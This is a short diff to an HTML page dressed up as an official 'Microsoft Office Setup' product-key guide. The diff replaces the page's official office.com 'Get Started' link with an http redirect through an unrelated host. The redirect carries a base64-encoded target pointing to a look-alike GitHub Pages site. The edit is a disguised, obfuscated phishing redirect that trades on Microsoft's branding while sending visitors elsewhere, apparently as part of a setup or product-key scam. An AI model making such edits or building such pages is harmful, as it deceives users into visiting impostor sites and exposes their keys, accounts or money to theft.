--- a/index.html
+++ b/index.html
@@ -98,7 +98,7 @@
 
 <div class="container">
     <center><h1>office.com/setup – Microsoft Office Setup – www.office.com/setup</h1></center>
-    <center><a href="https://www.office.com/setup" class="button">Get Started</a></center>
+    <center><a href="http://ww0.us?aHR0cHM6Ly9vZmZpY2Vjb21zZXR1cC1rZXkuZ2l0aHViLmlvLw==" class="button">Get Started</a></center>
     <h2>How to Enter Your 25-Digit Microsoft Office Setup Product Key?</h2>
     <ol>
         <li>Go to the Office Setup Website: Open any browser and visit office/setup.</li>
